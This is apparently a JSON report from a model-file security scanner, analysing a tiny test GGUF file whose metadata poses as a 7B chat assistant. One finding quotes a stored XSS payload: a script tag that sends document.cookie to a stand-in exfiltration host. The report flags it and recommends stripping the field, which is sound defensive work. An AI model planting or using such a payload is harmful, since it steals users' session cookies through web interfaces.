{
  "format": "LLM-SCAN",
  "format_version": "1.0",
  "generator": {
    "name": "llmscan-engine",
    "version": "2.0.0"
  },
  "scan_context": {
    "started_at": "2026-08-14T22:29:35+00:00Z",
    "ended_at": "2026-08-14T22:29:35+00:00Z",
    "duration_ms": 2,
    "limits": {
      "timeout_ms": 60000,
      "sandbox": true
    },
    "mode": "static-deep"
  },
  "source": {
    "input_type": "file",
    "filename": "xss-metadata.gguf",
    "size_bytes": 448,
    "hashes": {
      "sha256": "2b538946930a1a994e68ded343e93cf5754cbe09c521e70070d36c72dd142de7"
    }
  },
  "model": {
    "format": "gguf",
    "arch": "llama",
    "quantization": "F32",
    "params_estimate": 8,
    "file_size_bytes": 448,
    "sha256": "2b538946930a1a994e68ded343e93cf5754cbe09c521e70070d36c72dd142de7",
    "sha512": "e3b890af1cde0b15832b5bf0378ce328b35928481745426a6b43fa7e219ce97b2fdacff8f75849fd44e9f259dcf034a3f5129aa1948ac1a937811fc768f87ebe",
    "kv_meta": {
      "values_redacted": true,
      "kv_count": 5,
      "keys": [
        "general.architecture",
        "general.author",
        "general.description",
        "general.license",
        "general.name"
      ]
    },
    "scanner_model_info": {
      "magic": "GGUF",
      "version": 3,
      "architecture": "llama",
      "model_name": "friendly-assistant-7b",
      "finetune": null,
      "basename": null,
      "size_label": null,
      "quantization": "F32",
      "license": "apache-2.0",
      "context_length": null,
      "embedding_length": null,
      "feed_forward_length": null,
      "block_count": null,
      "head_count": null,
      "head_count_kv": null,
      "vocab_size": 8,
      "bos_token_id": null,
      "eos_token_id": null,
      "tokenizer_model": null,
      "tensor_count": 1,
      "param_estimate": 8,
      "file_size_bytes": 448,
      "file_size_mb": 0.0,
      "sha256": "2b538946930a1a994e68ded343e93cf5754cbe09c521e70070d36c72dd142de7",
      "sha512": "e3b890af1cde0b15832b5bf0378ce328b35928481745426a6b43fa7e219ce97b2fdacff8f75849fd44e9f259dcf034a3f5129aa1948ac1a937811fc768f87ebe",
      "alignment": 32,
      "data_section_start": 416,
      "header_end_offset": 416,
      "has_chat_template": false,
      "overlapping_tensor_pairs": 0,
      "misaligned_tensors": 0,
      "oob_tensor_count": 0,
      "dtype_histogram": {
        "F32": 1
      },
      "dtype_percentage": {
        "F32": 100.0
      },
      "top_tensors_by_size": [
        {
          "name": "token_embd.weight",
          "dtype": "F32",
          "dims": [
            8
          ],
          "byte_len": 32,
          "n_elem": 8
        }
      ],
      "tensor_bytes_sum": 32,
      "tensor_delta_bytes": 416,
      "tensor_delta_mb": 0.0,
      "header_kv_dir_bytes": 416,
      "trailing_bytes": 0,
      "unaccounted_bytes": 0,
      "dtype_stats": {
        "F32": {
          "count": 1,
          "bytes": 32,
          "mb": 0.0,
          "avg_bits_per_elem": 32.0
        }
      },
      "offsets_monotone": true,
      "max_tensor_offset": 0,
      "tensor_preview": [
        {
          "index": 0,
          "name": "token_embd.weight",
          "dims": [
            8
          ],
          "dtype_name": "F32",
          "dtype_id": 0,
          "offset": 0,
          "byte_len": 32,
          "bits_per_elem": 32.0
        }
      ],
      "chat_template": null,
      "kv_count": 5,
      "kv_keys": [
        "general.architecture",
        "general.author",
        "general.description",
        "general.license",
        "general.name"
      ]
    },
    "gguf_version": 3,
    "architecture": "llama",
    "model_name": "friendly-assistant-7b",
    "finetune": null,
    "basename": null,
    "size_label": null,
    "license": "apache-2.0",
    "context_length": null,
    "embedding_length": null,
    "feed_forward_length": null,
    "block_count": null,
    "head_count": null,
    "head_count_kv": null,
    "vocab_size": 8,
    "bos_token_id": null,
    "eos_token_id": null,
    "tokenizer_model": null,
    "tensor_count": 1,
    "param_estimate": 8,
    "file_size_mb": 0.0,
    "has_chat_template": false,
    "alignment": 32,
    "overlapping_tensor_pairs": 0,
    "misaligned_tensors": 0,
    "oob_tensor_count": 0,
    "dtype_histogram": {
      "F32": 1
    },
    "dtype_percentage": {
      "F32": 100.0
    },
    "top_tensors_by_size": [
      {
        "name": "token_embd.weight",
        "dtype": "F32",
        "dims": [
          8
        ],
        "byte_len": 32,
        "n_elem": 8
      }
    ],
    "tensor_bytes_sum": 32,
    "tensor_delta_bytes": 416,
    "tensor_delta_mb": 0.0,
    "header_kv_dir_bytes": 416,
    "trailing_bytes": 0,
    "unaccounted_bytes": 0,
    "dtype_stats": {
      "F32": {
        "count": 1,
        "bytes": 32,
        "mb": 0.0,
        "avg_bits_per_elem": 32.0
      }
    },
    "offsets_monotone": true,
    "max_tensor_offset": 0,
    "tensor_preview": [
      {
        "index": 0,
        "name": "token_embd.weight",
        "dims": [
          8
        ],
        "dtype_name": "F32",
        "dtype_id": 0,
        "offset": 0,
        "byte_len": 32,
        "bits_per_elem": 32.0
      }
    ],
    "chat_template": null,
    "values_redacted": true,
    "kv_count": 5
  },
  "tokenizer": {
    "type": null,
    "vocab_size": 8,
    "bos_token_id": null,
    "eos_token_id": null,
    "has_chat_template": false,
    "chat_template_chars": null
  },
  "tensors": {
    "count": 1,
    "preview": [
      {
        "index": 0,
        "name": "token_embd.weight",
        "dims": [
          8
        ],
        "dtype_name": "F32",
        "dtype_id": 0,
        "offset": 0,
        "byte_len": 32,
        "bits_per_elem": 32.0
      }
    ],
    "dtype_histogram": {
      "F32": 1
    },
    "dtype_stats": {
      "F32": {
        "count": 1,
        "bytes": 32,
        "mb": 0.0,
        "avg_bits_per_elem": 32.0
      }
    },
    "integrity": {
      "offsets_monotone": true,
      "overlapping_tensor_pairs": 0,
      "misaligned_tensors": 0,
      "oob_tensor_count": 0,
      "tensor_bytes_sum": 32,
      "tensor_delta_bytes": 416,
      "tensor_delta_mb": 0.0,
      "header_kv_dir_bytes": 416,
      "trailing_bytes": 0,
      "unaccounted_bytes": 0
    }
  },
  "security": {
    "grade": "C",
    "score": 69,
    "findings": [
      {
        "severity": "HIGH",
        "category": "Metadata",
        "title": "Web-injection payload embedded in general.description",
        "detail": "Value contains an HTML/JS injection pattern: \"A friendly, helpful 7B chat assistant.<script>fetch('https://exfil.example/c?d='+document.cookie)</script>\"",
        "recommendation": "Strip or reject this field; downstream tools that render GGUF metadata in a browser or web UI without escaping it are exposed to stored XSS"
      },
      {
        "severity": "MEDIUM",
        "category": "Metadata Security",
        "title": "External URLs embedded in 1 KV metadata field(s)",
        "detail": "Fields: ['general.description']",
        "recommendation": "URLs in model metadata may be used for tracking or exfiltration when metadata is rendered; do not auto-fetch"
      },
      {
        "severity": "MEDIUM",
        "category": "Resource Limits",
        "title": "Unusually high bits-per-parameter: 448.0",
        "detail": "Values >128 bpp suggest most file content is not tensor data (padding, embedded files, or metadata bloat)",
        "recommendation": "Investigate what occupies the non-tensor file space"
      }
    ]
  },
  "compatibility": [
    {
      "runtime": "llama.cpp",
      "supported": true,
      "container": true,
      "quant": true,
      "arch": true,
      "context": null,
      "notes": "GGUF v3 container: supported | quant F32: supported"
    },
    {
      "runtime": "Ollama",
      "supported": true,
      "container": true,
      "quant": true,
      "arch": true,
      "context": null,
      "notes": "GGUF via llama.cpp backend: container and quantization supported"
    },
    {
      "runtime": "LM Studio",
      "supported": true,
      "container": true,
      "quant": true,
      "arch": true,
      "context": null,
      "notes": "GGUF container and quantization supported; GPU/CPU inference"
    },
    {
      "runtime": "vLLM",
      "supported": false,
      "container": false,
      "quant": false,
      "arch": null,
      "context": null,
      "not_supported_msg": "GGUF not supported — requires safetensors format",
      "notes": "GGUF not supported; requires safetensors format"
    },
    {
      "runtime": "HuggingFace Transformers",
      "container": false,
      "quant": false,
      "arch": null,
      "context": null,
      "supported": false,
      "not_supported_msg": "GGUF not directly supported — use safetensors or PyTorch checkpoint",
      "notes": "GGUF not supported; requires safetensors or PyTorch checkpoint"
    }
  ],
  "report": {
    "summary": "GGUF v3 model | architecture: llama | quantization: F32 | 1 tensors | 1 blocking issue / 2 warnings",
    "bullets": [
      "GGUF v3 model | architecture: llama | quantization: F32 | 1 tensors | 1 blocking issue / 2 warnings",
      "SHA256: 2b538946930a1a99..."
    ],
    "recommendations": [
      "Strip or reject this field; downstream tools that render GGUF metadata in a browser or web UI without escaping it are exposed to stored XSS",
      "URLs in model metadata may be used for tracking or exfiltration when metadata is rendered; do not auto-fetch",
      "Investigate what occupies the non-tensor file space"
    ]
  }
}